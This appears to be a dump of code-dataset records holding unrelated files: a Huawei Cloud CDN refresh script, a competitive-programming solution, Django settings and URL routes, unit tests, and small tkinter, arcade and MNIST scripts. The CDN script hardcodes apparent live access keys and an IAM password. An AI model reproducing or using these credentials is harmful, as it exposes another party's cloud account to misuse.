E:\\MyPython\\huaweicloud\\cdn.py\nimport sys\nimport os\nimport re\nfrom openstack import connection\nos.environ.setdefault('OS_CDN_ENDPOINT_OVERRIDE','https://cdn.myhuaweicloud.com/v1.0/') # CDN API url,example:https://cdn.myhuaweicloud.com/v1.0/\n\n# AKSK Auth=======================\n# projectId = \"xxxxxxxxxxx\" # Project ID of cn-north-1\n# cloud = \"xxxxxxxxxxx\" # cdn use: cloud = \"myhuaweicloud.com\"\n# region = \"xxxxxxxxxxx\" # example: region = \"cn-north-1\"\n# AK = \"xxxxxxxxxxx\"\n# SK = \"xxxxxxxxxxx\"\n# conn = connection.Connection(\n# project_id=projectId,\n# cloud=cloud,\n# region=region,\n# ak=AK,\n# sk=SK\n# )\n\n'''\nprojectId = \"cn-north-1\" # Project ID of cn-north-1\ncloud = \"myhuaweicloud.com\" # cdn use: cloud = \"myhuaweicloud.com\"\nregion = \"cn-north-1\" # example: region = \"cn-north-1\"\nAK = \"DRNBEBBCVY30P0FULINB\"\nSK = \"s73VGPC6OaztuO40uKb5DpDsUXFR3RP7PJmcr2wb\"\n\nconn = connection.Connection(\n project_id=projectId,\n cloud=cloud,\n region=region,\n ak=AK,\n sk=SK)\n'''\n\n# token ============================\n# Authusername = \"replace-with-your-username\" #用户名称\n# password = \"replace-with-your-password\" #用户密码\n# projectId = \"replace-with-your-projectId\" #项目ID\n# userDomainId = \"replace-with-your-domainId\" #账户ID\n# auth_url = \"https://iam.example.com/v3\" # endpoint url\n# conn = connection.Connection(\n# auth_url=auth_url,\n# user_domain_id=userDomainId,\n# project_id=projectId,\n# username=username,\n# password=password\n# )\n\nusername = \"xczxcdnapi\" # IAM User Name\npassword = \"Xczx4VKcW3pFgc\" # IAM User Password\nprojectId = \"099eaa2c6500256c2f24c008eaa09045\" # Project ID of cn-north-1\nuserDomainId = \"092ac987a800f5b80fdac008a9a05080\" # Account ID\nauth_url = \"https://iam.myhuaweicloud.com/v3\" # IAM auth url,example: https://iam.myhuaweicloud.com/v3\nconn = connection.Connection(\n auth_url=auth_url,\n user_domain_id=userDomainId,\n project_id=projectId,\n username=username,\n password=password\n )\n \n# new version API\n# part 3: Refreshing and Preheating\n# Creating a Cache Refreshing Task\ndef refresh_create(_refresh_task):\n print(\"refresh files or dirs:\")\n task = conn.cdn.create_refresh_task(**_refresh_task)\n print(task)\n\n'''\nif __name__ == \"__main__\":\n # new version API\n # part 3: Refreshing and Preheating\n # Creating a Cache Refreshing Task\n refresh_file_task = {\n \"type\": \"file\",\n \"urls\": [\"https://appjs.changsha.cn/front_js/Mypublish.js\",\n \"https://appjs.changsha.cn/front_js/Mypublish.js\"]\n }\n refresh_dir_task = {\n \"type\": \"directory\",\n \"urls\": [\"xxxxxxxxxxx\",\n \"xxxxxxxxxxx\"]\n }\n'''\n# 获取输入参数\ndef GetPara(index):\n if sys.argv.__len__()>index:\n para=sys.argv[index];\n else:\n para=None;\n return para;\n\n# 程序路径\ndef GetPath():\n path=GetPara(0);\n if path.rindex(\"\\\\\") > 0:path=path[0:path.rindex(\"\\\\\")+1];\n if path.rindex(\"/\") > 0:path=path[0:path.rindex(\"/\")+1];\n return path;\n\n# 正则替换\ndef RegReplace(regstr,repalcestr,searchstr):\n result= re.sub(regstr,repalcestr,searchstr,0,re.I);\n return result;\n\n# 获取url,url;\ndef GetUrl():\n urllist=GetPara(2);\n urlary=[];\n if not(urllist is None):\n if urllist!=\"\":\n urllist=RegReplace(\"\\s*[\\r\\n]+\\s*\",\",\",urllist);\n urlary=urllist.split(\",\");\n return urlary;\n\n# 获取更新类型\ntype=GetPara(1);\n\n# 更新文件\nif type==\"file\":\n url=GetUrl();\n if url.__len__()>0:\n refresh_file_task = {\n \"type\": \"file\",\n \"urls\": url\n }\n refresh_create(refresh_file_task);\n\n# 更新目录\nif type==\"directory\":\n url=GetUrl();\n if url.__len__()>0:\n refresh_dir_task = {\n \"type\": \"directory\",\n \"urls\": url\n }\n refresh_create(refresh_dir_task);\n","sub_path":"plugs/cdn/cdn.py","file_name":"cdn.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"492464274","text":"from math import ceil\n\nN, M = map(int, input().split())\nA = list(map(int, input().split()))\n\n# 青マスが0の場合はNマスのハンコを作り1回押す\nif M == 0:\n print(1)\n exit(0)\n\nA.sort()\nspace = [0]*(M+1)\nK = 10**9\n\n# 最初の青マスまでの白マスの数\nif A[0] != 1:\n K = A[0]-1\n space[0] = A[0]-1\n\nfor i in range(M-1):\n tmp_mn = A[i+1]-A[i]-1\n # 0の場合=青マスが連続している場合は更新しない\n if tmp_mn != 0:\n K = min(K, tmp_mn)\n space[i+1] = tmp_mn\n\n# 最後の青マスから末尾までの白マスの数\nif A[-1] != N:\n tmp_mn = N-A[-1]\n K = min(K, tmp_mn)\n space[-1] = tmp_mn\n\n# ハンコを何回押すか求める\nans = 0\nfor s in space:\n if s == 0:\n continue\n\n ans += ceil(s/K)\nprint(ans)\n","sub_path":"ABC_D/ABC185_D.py","file_name":"ABC185_D.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651448340","text":"from .base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\nhosts = os.getenv('ALLOWED_HOSTS', '')\nif hosts:\n ALLOWED_HOSTS.extend(hosts.split(','))\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'CONN_MAX_AGE': 3600,\n 'HOST': os.getenv('MYSQL_HOST', '127.0.0.1'),\n 'NAME': os.getenv('MYSQL_DATABASE', 'ovdb'),\n 'USER': os.getenv('MYSQL_USER', 'root'),\n 'PASSWORD': os.getenv('MYSQL_PASSWORD', ''),\n 'PORT': os.getenv('MYSQL_PORT', '3306'),\n }\n}\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django_redis.cache.RedisCache',\n 'LOCATION': os.getenv('CACHE_LOCATION', 'redis://35.193.25.247:6379/'),\n 'OPTIONS': {\n 'CLIENT_CLASS': 'django_redis.client.DefaultClient',\n }\n }\n}\n","sub_path":"app/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56885319","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2013--, scikit-bio development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom __future__ import absolute_import, division, print_function\nfrom future.builtins import zip\n\nfrom unittest import TestCase, main\n\nfrom skbio.tree import CompressedTrie, fasta_to_pairlist\nfrom skbio.tree._trie import _CompressedNode\n\n\nclass CompressedNodeTests(TestCase):\n \"\"\"Tests for the _CompressedNode class\"\"\"\n\n def setUp(self):\n \"\"\"Set up test data for use in compresses node unit tests\"\"\"\n self.key = \"aba\"\n self.values = [1, 2]\n self.node = _CompressedNode(self.key, self.values)\n\n def test_init(self):\n \"\"\"Node init should construct the right structure\"\"\"\n # With no values should create a node with an empty list for values,\n # the provided key as key, and an empty dictionary as children\n n = _CompressedNode(self.key)\n self.assertEqual(n.values, [])\n self.assertEqual(n.key, self.key)\n self.assertEqual(n.children, {})\n # With values should create a node with the provided values list as\n # values, the provided key as key, and an empty dictionary as children\n n = _CompressedNode(self.key, self.values)\n self.assertEqual(n.values, self.values)\n self.assertEqual(n.key, self.key)\n self.assertEqual(n.children, {})\n\n def test_truth_value(self):\n \"\"\"Non zero should check for any data on the node\"\"\"\n n = _CompressedNode(\"\")\n self.assertFalse(bool(n))\n self.assertTrue(bool(self.node))\n\n def test_len(self):\n \"\"\"Should return the number of values attached to the node\"\"\"\n self.assertEqual(len(self.node), 2)\n\n def test_size(self):\n \"\"\"Should return the number of nodes attached to the node\"\"\"\n self.assertEqual(self.node.size, 1)\n\n def test_prefix_map(self):\n \"\"\"Should return the prefix map of the node\"\"\"\n exp = {1: [2]}\n self.assertEqual(self.node.prefix_map, exp)\n\n def test_insert(self):\n \"\"\"Correctly inserts a new key in the node\"\"\"\n n = _CompressedNode(self.key, self.values)\n n.insert(\"abb\", [3])\n\n # A new node has been create with the common prefix\n self.assertEqual(n.key, \"ab\")\n self.assertEqual(n.values, [])\n # Tests the old node and the new one has been correctly added\n # as children\n exp_keys = set([\"b\", \"a\"])\n self.assertEqual(set(n.children.keys()), exp_keys)\n # Check that the children have the current values\n self.assertEqual(n.children[\"b\"].key, \"b\")\n self.assertEqual(n.children[\"b\"].values, [[3]])\n self.assertEqual(n.children[\"b\"].children, {})\n\n self.assertEqual(n.children[\"a\"].key, \"a\")\n self.assertEqual(n.children[\"a\"].values, [1, 2])\n self.assertEqual(n.children[\"a\"].children, {})\n\n def test_find(self):\n \"\"\"The key could be found\"\"\"\n # Correctly retrieves the key stored in the calling node\n self.assertEqual(self.node.find(\"aba\"), [1, 2])\n\n # Correctly retrieves the key stored in a node attached to calling one\n n = _CompressedNode(self.key, self.values)\n n.insert(\"abb\", [3])\n self.assertEqual(n.find(\"aba\"), [1, 2])\n self.assertEqual(n.find(\"abb\"), [[3]])\n self.assertEqual(n.find(\"ab\"), [])\n\n # Correctly retrieves an empty list for a non existent key\n self.assertEqual(n.find(\"cd\"), [])\n\n\nclass CompressedTrieTests(TestCase):\n \"\"\"Tests for the CompressedTrie class\"\"\"\n\n def setUp(self):\n \"\"\"Set up test data for use in compressed trie unit tests\"\"\"\n self.data = [(\"ab\", \"0\"),\n (\"abababa\", \"1\"),\n (\"abab\", \"2\"),\n (\"baba\", \"3\"),\n (\"ababaa\", \"4\"),\n (\"a\", \"5\"),\n (\"abababa\", \"6\"),\n (\"bab\", \"7\"),\n (\"babba\", \"8\")]\n self.empty_trie = CompressedTrie()\n self.trie = CompressedTrie(self.data)\n\n def test_init(self):\n \"\"\"Trie init should construct the right structure\"\"\"\n # In no pair_list is provided, it should create an empty Trie\n t = CompressedTrie()\n self.assertEqual(t._root.key, \"\")\n self.assertEqual(t._root.values, [])\n self.assertEqual(t._root.children, {})\n # If a pair_list is provided, it should insert all the data\n t = CompressedTrie(self.data)\n self.assertEqual(t._root.key, \"\")\n self.assertEqual(t._root.values, [])\n self.assertEqual(set(t._root.children.keys()), set([\"a\", \"b\"]))\n\n def test_non_zero(self):\n \"\"\"Non zero should check for any data on the trie\"\"\"\n self.assertFalse(self.empty_trie)\n self.assertTrue(self.trie)\n\n def test_len(self):\n \"\"\"Should return the number of values attached to the trie\"\"\"\n self.assertEqual(len(self.empty_trie), 0)\n self.assertEqual(len(self.trie), 9)\n\n def test_size(self):\n \"\"\"Should return the number of nodes attached to the trie\"\"\"\n self.assertEqual(self.empty_trie.size, 1)\n self.assertEqual(self.trie.size, 10)\n\n def test_prefix_map(self):\n \"\"\"Should map prefix to values\"\"\"\n exp1 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"8\": [\"7\"],\n \"3\": [],\n \"4\": []}\n exp2 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"8\": [],\n \"3\": [\"7\"],\n \"4\": []}\n self.assertTrue(self.trie.prefix_map in (exp1, exp2))\n\n def test_insert(self):\n \"\"\"Correctly inserts a new key into the trie\"\"\"\n t = CompressedTrie(self.data)\n t.insert(\"babc\", \"9\")\n self.assertTrue(\"9\" in t.find(\"babc\"))\n\n exp1 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [\"7\"],\n \"3\": [],\n \"4\": [],\n \"8\": []}\n exp2 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [],\n \"3\": [\"7\"],\n \"4\": [],\n \"8\": []}\n exp3 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [],\n \"3\": [],\n \"4\": [],\n \"8\": [\"7\"]}\n self.assertTrue(t.prefix_map in (exp1, exp2, exp3))\n\n def test_find(self):\n \"\"\"Correctly founds the values present on the trie\"\"\"\n for key, value in self.data:\n self.assertTrue(value in self.trie.find(key))\n self.assertEqual(self.trie.find(\"cac\"), [])\n self.assertEqual(self.trie.find(\"abababa\"), [\"1\", \"6\"])\n\n\nclass FastaToPairlistTests(TestCase):\n \"\"\"Tests for the fasta_to_pairlist function\"\"\"\n\n def setUp(self):\n self.seqs = [(\"sid_0\", \"AC\"),\n (\"sid_1\", \"ACAGTC\"),\n (\"sid_2\", \"ACTA\"),\n (\"sid_3\", \"CAGT\"),\n (\"sid_4\", \"CATGAA\"),\n (\"sid_5\", \"A\"),\n (\"sid_6\", \"CATGTA\"),\n (\"sid_7\", \"CAA\"),\n (\"sid_8\", \"CACCA\")]\n\n def test_fasta_to_pairlist(self):\n \"\"\"Correctly returns a list of (seq, label)\"\"\"\n exp = [(\"AC\", \"sid_0\"),\n (\"ACAGTC\", \"sid_1\"),\n (\"ACTA\", \"sid_2\"),\n (\"CAGT\", \"sid_3\"),\n (\"CATGAA\", \"sid_4\"),\n (\"A\", \"sid_5\"),\n (\"CATGTA\", \"sid_6\"),\n (\"CAA\", \"sid_7\"),\n (\"CACCA\", \"sid_8\")]\n\n for obs, exp in zip(fasta_to_pairlist(self.seqs), exp):\n self.assertEqual(obs, exp)\n\nif __name__ == '__main__':\n main()\n","sub_path":"skbio/tree/tests/test_trie.py","file_name":"test_trie.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"32409005","text":"'''\r\nCreated on 26 may. 2017\r\n\r\n@author: marilola.afonso@ulpgc.com\r\n@organization: MACbioIDi\r\n@version: 0.0 for NAMIC 25th Project Week. Summer 2017\r\n'''\r\n\r\nimport tkinter\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport xml.etree.ElementTree as ET\r\nfrom root.nested.language import mdasLiteral\r\n\r\nclass simpleapp_tk(tkinter.Tk):\r\n def __init__(self,parent):\r\n tkinter.Tk.__init__(self, parent)\r\n self.parent = parent\r\n self.initialize()\r\n\r\n def initialize(self):\r\n self.geometry(\"600x300\")\r\n\r\n # Get Languages\r\n self.literal = mdasLiteral('module1')\r\n self.langCode = []\r\n self.langDescription = []\r\n for e in self.literal.getLanguages():\r\n self.langCode.append(e.code) \r\n self.langDescription.append(e.description)\r\n\r\n self.comboBox = ttk.Combobox(self)\r\n if self.literal.getLanguage(self.literal) == 'ar':\r\n print (\"Combo Ok\")\r\n self.comboBox.place(x=10,y=10)\r\n else:\r\n self.comboBox.place(x=450,y=10)\r\n self.comboBox.state(['readonly'])\r\n self.comboBox['values'] = self.langDescription\r\n self.comboBox.bind(\"<>\", self.OnOptionSelect)\r\n\r\n code = self.literal.getLanguage(self.literal)\r\n i = self.langCode.index(code)\r\n self.comboBox.current(i)\r\n #\r\n\r\n self.entryText = tkinter.StringVar()\r\n self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n if self.langCode[i] == 'ar':\r\n print (\"Estamos en arabe\")\r\n self.entry.place(x=400,y=60)\r\n self.entry = tkinter.Entry(self,textvariable=self.entryText,justify='right')\r\n else:\r\n self.entry.place(x=100,y=60)\r\n self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n\r\n self.entry.bind(\"\", self.OnPressEnter)\r\n self.entryText.set(self.literal.getLiteral('l_00001'))\r\n\r\n self.labelText = tkinter.StringVar()\r\n self.label = tkinter.Label(self,textvariable=self.labelText,anchor=\"w\")\r\n if self.langCode[i] == 'ar':\r\n self.label.place(x=550,y=60)\r\n else:\r\n self.label.place(x=10,y=60)\r\n\r\n self.labelText.set(self.literal.getLiteral('l_00002'))\r\n\r\n self.button = tkinter.Button(self,text=self.literal.getLiteral('l_00003'),command=self.OnButtonClick)\r\n if self.langCode[i] == 'ar':\r\n self.button.place(x=100,y=250)\r\n else:\r\n self.button.place(x=500,y=250)\r\n\r\n def OnButtonClick(self):\r\n print (\"You clicked the button !\")\r\n\r\n def OnPressEnter(self,event):\r\n print (\"You pressed enter !\")\r\n self.labelText.set(self.entryText.get() + \" You pressed enter !\")\r\n\r\n def OnOptionSelect(self,event):\r\n print (\"Option selected !\")\r\n i = self.comboBox.current()\r\n print (i)\r\n language = self.langCode[i]\r\n print (language)\r\n ''' Combo box '''\r\n if language == 'ar':\r\n self.comboBox.place(x=10,y=10)\r\n self.comboBox.align=\"right\"\r\n else:\r\n self.comboBox.place(x=450,y=10)\r\n ''' Text box ''' \r\n if language == 'ar':\r\n print (\"Estamos en arabe\")\r\n self.entry.place(x=400,y=60)\r\n self.entry = tkinter.Entry(self,textvariable=self.entryText,justify='right')\r\n else:\r\n self.entry.place(x=100,y=60)\r\n self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n\r\n ''' Label ''' \r\n if language == 'ar':\r\n self.label.place(x=550,y=60)\r\n else:\r\n self.label.place(x=10,y=60)\r\n ''' Button ''' \r\n if language == 'ar':\r\n self.button.place(x=100,y=250)\r\n else:\r\n self.button.place(x=500,y=250) \r\n \r\n\r\n doc = ET.parse('../language/module1_' + language + '.xml')\r\n root = doc.getroot()\r\n literals = root.find('literals')\r\n\r\n literal = literals.find('l_00001').text\r\n print(literal)\r\n self.labelText.set(literal)\r\n\r\n literal = literals.find('l_00003').text\r\n print(literal)\r\n self.button['text'] = literal\r\n\r\n literal = literals.find('l_00002').text\r\n print(literal)\r\n self.entryText.set(literal)\r\n\r\n self.literal.setLast(language)\r\n \r\n messagebox.showinfo(\"mdasMessage\", \"Changes will take effect at the next reload\") \r\n\r\nif __name__ == \"__main__\":\r\n app = simpleapp_tk(None)\r\n app.title('mdasLiteral')\r\n app.mainloop()","sub_path":"Test_Literal/mdasLiteral.zip_expanded/test/src/root/nested/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"242799721","text":"'''\nFLAG PROJECT\n---------------\nMake your flag 260 pixels tall\nUse the scaling image on the website to determine other dimensions\nThe hexadecimal colors for the official flag are red:#BF0A30 and blue:#002868\nTitle the window, \"The Stars and Stripes\"\nI used a draw_text command and used 20 pt. asterisks for the stars.\nWe will have a competition to see who can make this flag in the least lines of code.\nThe record is 16! You will have to use some loops to achieve this.\n'''\nimport arcade\nredline_y = 250\nstar_y = 230\nstar_x = 15.38\narcade.open_window(494,260,\"The Stars and Stripes\")\narcade.set_background_color((255,255,255))\narcade.start_render()\nfor i in range(7):\n arcade.draw_rectangle_filled(247, redline_y, 494, 20, (191,10,48))\n redline_y -= 40\narcade.draw_rectangle_filled(98.8,190,197.6,140,(0,40,104))\nfor i in range(5):\n for i in range(6):\n arcade.draw_text(\"*\", star_x, star_y, arcade.color.WHITE, 20)\n star_x += 30.76\n star_y -= 28.08\n star_x = 15.38\nstar_y = 215.96\nstar_x = 30.76\nfor i in range(4):\n for i in range(5):\n arcade.draw_text(\"*\", star_x, star_y, arcade.color.WHITE, 20)\n star_x += 30.76\n star_x = 30.76\n star_y -= 28.08\narcade.finish_render()\narcade.run()","sub_path":"7.1_Flag.py","file_name":"7.1_Flag.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"528038049","text":"import os\nimport unittest\nfrom mytardis_ngs_ingestor.mytardis_models import MyTardisParameterSet\n\n\nclass TestingParameterSetModel(MyTardisParameterSet):\n \"\"\"\n :type some_string_field: unicode\n :type a_float_field: float\n \"\"\"\n\n def __init__(self):\n super(TestingParameterSetModel, self).__init__()\n self.some_string_field = None # type: unicode\n self.a_float_field = None # type: float\n\n # Dictionaries to allow reconstitution of the schema for each parameter\n\n # run_id fixture\n self._run_id__attr_schema = {\n u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'name': u'some_string_field',\n u'data_type': 2,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u'',\n u'comparison_type': 1,\n u'full_name': u'A string field',\n u'units': u'', u'order': 9999,\n u'schema': [u'http://www.tardis.edu.au/schema/test']}} # type: dict\n\n # run_number fixture\n self._run_number__attr_schema = {\n u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'name': u'a_float_field',\n u'data_type': 1,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u'',\n u'comparison_type': 1,\n u'full_name': u'A float field',\n u'units': u'',\n u'order': 9999,\n u'schema': [u'http://www.tardis.edu.au/schema/test']}} # type: dict\n\n self._subtype__schema = \"testing-parameter-set\" # type: unicode\n self._model__schema = \"tardis_portal.schema\" # type: unicode\n self._name__schema = \"A test parameter set model\" # type: unicode\n self._pk__schema = None # type: NoneType\n self._type__schema = 1 # type: int\n self._hidden__schema = False # type: bool\n self._namespace__schema = \"http://www.tardis.edu.au/schema/test\" # type: unicode\n self._immutable__schema = True # type: bool\n\n\nclass IlluminaParserTestCase(unittest.TestCase):\n def setUp(self):\n self.parameterset_model = TestingParameterSetModel()\n\n def tearDown(self):\n pass\n\n def test__to_schema(self):\n schema_as_dict = self.parameterset_model.to_schema()\n self.assertEqual(schema_as_dict, [\n {'pk': None, 'model': 'tardis_portal.schema',\n 'fields': {'name': 'A test parameter set model',\n 'namespace': 'http://www.tardis.edu.au/schema/test',\n 'subtype': 'testing-parameter-set', 'hidden': False,\n 'type': 1, 'immutable': True}}])\n\n def test__to_parameter_schema(self):\n param_schema_dict = self.parameterset_model.to_parameter_schema()\n self.maxDiff = None\n self.assertDictEqual(param_schema_dict[0],\n {u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'full_name': u'A float field',\n u'comparison_type': 1,\n u'schema': [\n u'http://www.tardis.edu.au/schema/test'],\n u'name': u'a_float_field',\n u'data_type': 1,\n u'units': u'', u'order': 9999,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u''}})\n self.assertDictEqual(param_schema_dict[1],\n {u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'full_name': u'A string field',\n u'comparison_type': 1,\n u'schema': [\n u'http://www.tardis.edu.au/schema/test'],\n u'name': u'some_string_field',\n u'data_type': 2,\n u'units': u'', u'order': 9999,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u''}})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"76602747","text":"from __future__ import print_function\r\nimport tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\n\r\npath_dir = './testNumber/a/'\r\nf_list = os.listdir(path_dir)\r\nfile_list = [file for file in f_list if file.endswith(\".jpg\")]\r\nfile_list.sort()\r\ntest_images = input_data.read_data_sets(path_dir, one_hot=True)\r\n\r\nkeep_prob = tf.placeholder(tf.float32)\r\nX=tf.placeholder(tf.float32, [None, 784])\r\nY=tf.placeholder(tf.float32, [None, 10])\r\nX_img=tf.reshape(X, [-1, 28, 28, 1])\r\n\r\n# Convolution Layer 1\r\nW1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01))\r\nCL1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')\r\nCL1 = tf.nn.relu(CL1)\r\n# pooling Layer 1\r\nPL1 = tf.nn.max_pool(CL1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL1 = tf.nn.dropout(PL1, keep_prob=keep_prob)\r\n# Convolution Layer 2\r\nW2 = tf.Variable(tf.random_normal([3,3,32,64], stddev=0.01))\r\nCL2 = tf.nn.conv2d(PL1, W2, strides=[1,1,1,1], padding='SAME')\r\nCL2 = tf.nn.relu(CL2)\r\n# pooling Layer 2\r\nPL2 = tf.nn.max_pool(CL2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL2 = tf.nn.dropout(PL2, keep_prob=keep_prob)\r\n# Convolution Layer 3\r\nW3 = tf.Variable(tf.random_normal([3,3,64, 128], stddev=0.01))\r\nCL3 = tf.nn.conv2d(PL2, W3, strides=[1,1,1,1], padding='SAME')\r\nCL3 = tf.nn.relu(CL3)\r\n# pooling Layer 2\r\nPL3 = tf.nn.max_pool(CL3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL3 = tf.nn.dropout(PL3, keep_prob=keep_prob)\r\n\r\n# Fully Connected (FC) Layer\r\nL_flat = tf.reshape(PL3, [-1, 4*4*128])\r\nW4 = tf.Variable(tf.random_normal([4*4*128,10], stddev=0.01))\r\nb4 = tf.Variable(tf.random_normal([10]))\r\n\r\n# Model, Cost, Train\r\nmode_LC = tf.matmul(L_flat, W4) + b4\r\nmodel = tf.nn.softmax(mode_LC)\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=mode_LC, labels=Y))\r\n\r\n# Session\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # 저장된 모델 파라미터를 가져옵니다.\r\n model_path = \"deep_tmp/model.saved\"\r\n saver = tf.train.Saver()\r\n\r\n saver.restore(sess, model_path)\r\n print(\"Model restored from file: %s\" % model_path)\r\n\r\n n = len(file_list)\r\n images = np.zeros((n, 784))\r\n #prediction = np.zeros((n))\r\n\r\n i = 0\r\n for file in file_list:\r\n fname = path_dir + file\r\n img = cv2.imread(fname, cv2.IMREAD_GRAYSCALE)\r\n flatten = img.flatten() / 255.0\r\n images[i] = flatten\r\n image = np.reshape(images[i], (1, -1))\r\n prediction = sess.run(tf.argmax(model, 1), feed_dict={X: image, keep_prob: 0.7})\r\n\r\n print(prediction)\r\n cv2.imshow(str(file), img)\r\n\r\n i += 1\r\n cv2.waitKey(0)\r\n\r\n #print(sess.run(tf.argmax(model, 1), feed_dict={X: images}))\r\ncv2.destroyAllWindows()\r\n'''\r\n cv2.imshow(str(file), img)\r\n location = (14, 14)\r\n font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX\r\n cv2.putText(img, str(prediction[i]), location, font)\r\n'''\r\n","sub_path":"MNIST_deepCNN_test.py","file_name":"MNIST_deepCNN_test.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579192567","text":"\"\"\"main_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# from clone.Final_Project.main_project.backend.views import friend_page\n# from Final_Project.main_project.backend.views import friend_page\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import TemplateView\nimport backend.views as backend\nfrom django.contrib.auth import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n \n # path(\n # 'serviceworker.js',\n # TemplateView.as_view(template_name='serviceworker.js', content_type='application/javascript'),\n # name='serviceworker.js',\n # ),\n\n path('', TemplateView.as_view(template_name=\"start.html\")),\n path('', include('pwa.urls')),\n path('start', backend.start_page),\n path('login', backend.login_page),\n # path('accounts/login/', views.LoginView.as_view(template_name='login.html'), name='login'),\n\n path('register', backend.register_page),\n path('main', backend.main_page),\n path('mission', backend.mission_page),\n path('chatroom', backend.chatroom_page),\n path('manager', backend.manager_page),\n path('profile', backend.profile_page),\n path('friend', backend.friend_page),\n path('shop',backend.shop_page),\n path('aboutus', backend.aboutus_page),\n\n path('register_submit', backend.register_submit),\n path('login_check', backend.login_check),\n path('logout', backend.logout),\n\n path('get_all_mission', backend.get_all_mission),\n path('get_img', backend.get_img),\n path('get_img_count', backend.get_img_count),\n path('get_mission_group', backend.get_mission_group),\n path('join_mission_group', backend.join_mission_group),\n path('create_mission_group', backend.create_mission_group),\n path('get_mission_chatroom_list', backend.get_mission_chatroom_list),\n path('check_chatroom', backend.check_chatroom),\n path('mission_chatroom_update', backend.mission_chatroom_update),\n path('get_mission_chatroom_member', backend.get_mission_chatroom_member),\n path('kick_mission_chatroom_member', backend.kick_mission_chatroom_member),\n path('exit_mission_chatroom', backend.exit_mission_chatroom),\n \n path('submit_mission_group_check', backend.submit_mission_group_check),\n path('submit_mission_group', backend.submit_mission_group),\n path('upload_profile_photo', backend.upload_profile_photo),\n\n\n path('friend_chatroom_update', backend.friend_chatroom_update),\n path('save_profile_intro', backend.save_profile_intro),\n path('get_all_shop', backend.get_all_shop),\n path('buy_product', backend.buy_product),\n path('get_my_shop', backend.get_my_shop),\n path('use_product', backend.use_product),\n path('get_friend_group', backend.get_friend_group),\n path('get_friend_invitation', backend.get_friend_invitation),\n path('search_friend_ID', backend.search_friend_ID),\n path('is_friend', backend.is_friend),\n path('get_relationship', backend.get_relationship),\n \n path('send_invitation', backend.send_invitation),\n path('accept_invitation', backend.accept_invitation),\n path('reject_invitation', backend.reject_invitation),\n path('cancel_invitation', backend.cancel_invitation),\n path('delete_friend', backend.delete_friend),\n path('get_card', backend.get_card),\n path('get_friend_chatroom', backend.get_friend_chatroom),\n\n path('submission_to_finish', backend.submission_to_finish),\n \n \n # \n path('get_my_mission' , backend.get_my_mission),\n path('is_shared' , 